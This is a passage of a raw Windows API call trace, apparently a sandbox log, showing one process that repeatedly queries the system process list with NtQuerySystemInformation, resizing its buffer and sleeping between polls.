[0135.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.677] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.692] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.708] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.726] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.741] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.758] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.770] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.786] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.808] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.836] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.850] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.853] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.863] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.885] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.896] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.896] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.907] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.911] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.928] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.945] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.958] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.974] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.989] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.005] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.018] 